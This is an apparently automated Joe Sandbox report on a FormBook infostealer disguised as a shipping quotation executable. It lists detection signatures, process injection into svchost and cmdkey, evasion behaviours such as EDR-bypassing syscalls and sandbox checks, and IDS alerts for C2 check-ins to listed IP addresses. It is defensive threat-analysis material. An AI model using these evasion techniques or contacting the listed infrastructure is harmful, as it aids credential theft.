Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION#070125-ELITE MARINE .exe

Overview

General Information

Sample name:QUOTATION#070125-ELITE MARINE .exe
Analysis ID:1586802
MD5:71a9653e383348db78edaa7619dea426
SHA1:4670f01da3fe979ffe6c27ef16080cdb71c03770
SHA256:8cf3f5031f2201c448b2dc53d88b0a2142797116a6781d0f1222733127711add
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • QUOTATION#070125-ELITE MARINE .exe (PID: 2636 cmdline: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe" MD5: 71A9653E383348DB78EDAA7619DEA426)
    • svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • RAVCpl64.exe (PID: 7540 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cmdkey.exe (PID: 7612 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • firefox.exe (PID: 7964 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", CommandLine|base64offset|contains: 0H4, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", ParentImage: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, ParentProcessId: 2636, ParentProcessName: QUOTATION#070125-ELITE MARINE .exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", ProcessId: 7524, ProcessName: svchost.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", CommandLine|base64offset|contains: 0H4, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", ParentImage: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, ParentProcessId: 2636, ParentProcessName: QUOTATION#070125-ELITE MARINE .exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", ProcessId: 7524, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-09T16:47:27.947178+010028554651A Network Trojan was detected192.168.11.2049745194.9.94.8580TCP
              2025-01-09T16:47:52.606616+010028554651A Network Trojan was detected192.168.11.2049749198.58.118.16780TCP
              2025-01-09T16:48:06.419387+010028554651A Network Trojan was detected192.168.11.2049753104.21.96.180TCP
              2025-01-09T16:48:20.081388+010028554651A Network Trojan was detected192.168.11.2049757199.192.21.16980TCP
              2025-01-09T16:48:44.345642+010028554651A Network Trojan was detected192.168.11.204976147.83.1.9080TCP
              2025-01-09T16:48:57.804012+010028554651A Network Trojan was detected192.168.11.204976576.223.54.14680TCP
              2025-01-09T16:49:14.627559+010028554651A Network Trojan was detected192.168.11.2049769160.25.166.12380TCP
              2025-01-09T16:49:27.995965+010028554651A Network Trojan was detected192.168.11.2049773104.21.13.14180TCP
              2025-01-09T16:49:50.871491+010028554651A Network Trojan was detected192.168.11.2049777136.243.64.14780TCP
              2025-01-09T16:50:05.566422+010028554651A Network Trojan was detected192.168.11.2049781202.95.11.11080TCP
              2025-01-09T16:50:20.090490+010028554651A Network Trojan was detected192.168.11.204978576.223.54.14680TCP
              2025-01-09T16:50:33.855509+010028554651A Network Trojan was detected192.168.11.2049789103.106.67.11280TCP
              2025-01-09T16:50:47.745209+010028554651A Network Trojan was detected192.168.11.2049793104.21.112.180TCP
              2025-01-09T16:51:04.493043+010028554651A Network Trojan was detected192.168.11.2049794194.9.94.8580TCP
              2025-01-09T16:51:17.815683+010028554651A Network Trojan was detected192.168.11.2049798198.58.118.16780TCP
              2025-01-09T16:51:31.459454+010028554651A Network Trojan was detected192.168.11.2049802104.21.96.180TCP
              2025-01-09T16:51:44.941798+010028554651A Network Trojan was detected192.168.11.2049806199.192.21.16980TCP
              2025-01-09T16:52:07.952797+010028554651A Network Trojan was detected192.168.11.204981047.83.1.9080TCP
              2025-01-09T16:52:24.321770+010028554651A Network Trojan was detected192.168.11.204981476.223.54.14680TCP
              2025-01-09T16:52:38.691764+010028554651A Network Trojan was detected192.168.11.2049818160.25.166.12380TCP
              2025-01-09T16:52:54.955659+010028554651A Network Trojan was detected192.168.11.2049822104.21.13.14180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-09T16:47:43.571002+010028554641A Network Trojan was detected192.168.11.2049746198.58.118.16780TCP
              2025-01-09T16:47:46.253735+010028554641A Network Trojan was detected192.168.11.2049747198.58.118.16780TCP
              2025-01-09T16:47:49.930634+010028554641A Network Trojan was detected192.168.11.2049748198.58.118.16780TCP
              2025-01-09T16:47:58.492477+010028554641A Network Trojan was detected192.168.11.2049750104.21.96.180TCP
              2025-01-09T16:48:01.112784+010028554641A Network Trojan was detected192.168.11.2049751104.21.96.180TCP
              2025-01-09T16:48:03.753364+010028554641A Network Trojan was detected192.168.11.2049752104.21.96.180TCP
              2025-01-09T16:48:11.979736+010028554641A Network Trojan was detected192.168.11.2049754199.192.21.16980TCP
              2025-01-09T16:48:14.679447+010028554641A Network Trojan was detected192.168.11.2049755199.192.21.16980TCP
              2025-01-09T16:48:17.382857+010028554641A Network Trojan was detected192.168.11.2049756199.192.21.16980TCP
              2025-01-09T16:48:35.800443+010028554641A Network Trojan was detected192.168.11.204975847.83.1.9080TCP
              2025-01-09T16:48:38.696763+010028554641A Network Trojan was detected192.168.11.204975947.83.1.9080TCP
              2025-01-09T16:48:41.499193+010028554641A Network Trojan was detected192.168.11.204976047.83.1.9080TCP
              2025-01-09T16:48:49.795815+010028554641A Network Trojan was detected192.168.11.204976276.223.54.14680TCP
              2025-01-09T16:48:52.454031+010028554641A Network Trojan was detected192.168.11.204976376.223.54.14680TCP
              2025-01-09T16:48:55.135738+010028554641A Network Trojan was detected192.168.11.204976476.223.54.14680TCP
              2025-01-09T16:49:05.970373+010028554641A Network Trojan was detected192.168.11.2049766160.25.166.12380TCP
              2025-01-09T16:49:08.852586+010028554641A Network Trojan was detected192.168.11.2049767160.25.166.12380TCP
              2025-01-09T16:49:11.747863+010028554641A Network Trojan was detected192.168.11.2049768160.25.166.12380TCP
              2025-01-09T16:49:20.046310+010028554641A Network Trojan was detected192.168.11.2049770104.21.13.14180TCP
              2025-01-09T16:49:22.706080+010028554641A Network Trojan was detected192.168.11.2049771104.21.13.14180TCP
              2025-01-09T16:49:25.350992+010028554641A Network Trojan was detected192.168.11.2049772104.21.13.14180TCP
              2025-01-09T16:49:42.592031+010028554641A Network Trojan was detected192.168.11.2049774136.243.64.14780TCP
              2025-01-09T16:49:45.344603+010028554641A Network Trojan was detected192.168.11.2049775136.243.64.14780TCP
              2025-01-09T16:49:48.123081+010028554641A Network Trojan was detected192.168.11.2049776136.243.64.14780TCP
              2025-01-09T16:49:56.894044+010028554641A Network Trojan was detected192.168.11.2049778202.95.11.11080TCP
              2025-01-09T16:49:59.710386+010028554641A Network Trojan was detected192.168.11.2049779202.95.11.11080TCP
              2025-01-09T16:50:02.566506+010028554641A Network Trojan was detected192.168.11.2049780202.95.11.11080TCP
              2025-01-09T16:50:11.048802+010028554641A Network Trojan was detected192.168.11.204978276.223.54.14680TCP
              2025-01-09T16:50:14.734267+010028554641A Network Trojan was detected192.168.11.204978376.223.54.14680TCP
              2025-01-09T16:50:17.419595+010028554641A Network Trojan was detected192.168.11.204978476.223.54.14680TCP
              2025-01-09T16:50:25.749494+010028554641A Network Trojan was detected192.168.11.2049786103.106.67.11280TCP
              2025-01-09T16:50:28.452346+010028554641A Network Trojan was detected192.168.11.2049787103.106.67.11280TCP
              2025-01-09T16:50:31.151068+010028554641A Network Trojan was detected192.168.11.2049788103.106.67.11280TCP
              2025-01-09T16:50:39.403064+010028554641A Network Trojan was detected192.168.11.2049790104.21.112.180TCP
              2025-01-09T16:50:42.056631+010028554641A Network Trojan was detected192.168.11.2049791104.21.112.180TCP
              2025-01-09T16:50:44.773237+010028554641A Network Trojan was detected192.168.11.2049792104.21.112.180TCP
              2025-01-09T16:51:09.800196+010028554641A Network Trojan was detected192.168.11.2049795198.58.118.16780TCP
              2025-01-09T16:51:12.475652+010028554641A Network Trojan was detected192.168.11.2049796198.58.118.16780TCP
              2025-01-09T16:51:15.148193+010028554641A Network Trojan was detected192.168.11.2049797198.58.118.16780TCP
              2025-01-09T16:51:23.504673+010028554641A Network Trojan was detected192.168.11.2049799104.21.96.180TCP
              2025-01-09T16:51:26.157606+010028554641A Network Trojan was detected192.168.11.2049800104.21.96.180TCP
              2025-01-09T16:51:28.855881+010028554641A Network Trojan was detected192.168.11.2049801104.21.96.180TCP
              2025-01-09T16:51:36.844192+010028554641A Network Trojan was detected192.168.11.2049803199.192.21.16980TCP
              2025-01-09T16:51:39.544390+010028554641A Network Trojan was detected192.168.11.2049804199.192.21.16980TCP
              2025-01-09T16:51:42.254723+010028554641A Network Trojan was detected192.168.11.2049805199.192.21.16980TCP
              2025-01-09T16:51:59.430233+010028554641A Network Trojan was detected192.168.11.204980747.83.1.9080TCP
              2025-01-09T16:52:02.291301+010028554641A Network Trojan was detected192.168.11.204980847.83.1.9080TCP
              2025-01-09T16:52:05.102104+010028554641A Network Trojan was detected192.168.11.204980947.83.1.9080TCP
              2025-01-09T16:52:14.256758+010028554641A Network Trojan was detected192.168.11.204981176.223.54.14680TCP
              2025-01-09T16:52:16.935495+010028554641A Network Trojan was detected192.168.11.204981276.223.54.14680TCP
              2025-01-09T16:52:20.616692+010028554641A Network Trojan was detected192.168.11.204981376.223.54.14680TCP
              2025-01-09T16:52:30.038048+010028554641A Network Trojan was detected192.168.11.2049815160.25.166.12380TCP
              2025-01-09T16:52:32.922872+010028554641A Network Trojan was detected192.168.11.2049816160.25.166.12380TCP
              2025-01-09T16:52:35.806472+010028554641A Network Trojan was detected192.168.11.2049817160.25.166.12380TCP
              2025-01-09T16:52:46.995877+010028554641A Network Trojan was detected192.168.11.2049819104.21.13.14180TCP
              2025-01-09T16:52:49.654907+010028554641A Network Trojan was detected192.168.11.2049820104.21.13.14180TCP
              2025-01-09T16:52:52.329252+010028554641A Network Trojan was detected192.168.11.2049821104.21.13.14180TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: QUOTATION#070125-ELITE MARINE .exeAvira: detected
              Multi AV Scanner detection for submitted file
              Source: QUOTATION#070125-ELITE MARINE .exeReversingLabs: Detection: 60%
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Machine Learning detection for sample
              Source: QUOTATION#070125-ELITE MARINE .exeJoe Sandbox ML: detected
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000001.00000003.11702724830.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11734330614.0000000003200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11152091635.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11648789785.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11646044895.0000000003500000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.000000000384D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11733827034.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11737430340.0000000003572000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.0000000003720000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11152091635.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11648789785.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11646044895.0000000003500000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000003.00000002.15246648295.000000000384D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11733827034.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11737430340.0000000003572000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.0000000003720000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: cmdkey.pdb source: svchost.exe, 00000001.00000003.11702724830.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11734330614.0000000003200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: RAVCpl64.exe, 00000002.00000002.16214552888.00000000066DC000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000003D4C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.000000000291C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: svchost.pdbUGP source: RAVCpl64.exe, 00000002.00000002.16214552888.00000000066DC000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000003D4C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.000000000291C000.00000004.80000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0066C2A2 FindFirstFileExW,0_2_0066C2A2
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A68EE FindFirstFileW,FindClose,0_2_006A68EE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_006A698F
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0069D076
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0069D3A9
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006A9642
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006A979D
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_006A9B2B
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0069DBBE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_006A5C97
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov ebx, 00000004h1_2_03C804E8
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h2_2_034704E8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then mov ebx, 00000004h3_2_034704E8

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49753 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49749 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49745 -> 194.9.94.85:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49746 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 202.95.11.110:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49769 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 136.243.64.147:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49773 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49789 -> 103.106.67.112:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49781 -> 202.95.11.110:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 103.106.67.112:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 136.243.64.147:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 103.106.67.112:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49757 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 103.106.67.112:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49785 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 104.21.112.1:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49765 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 202.95.11.110:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 202.95.11.110:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 104.21.112.1:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49802 -> 104.21.96.1:80
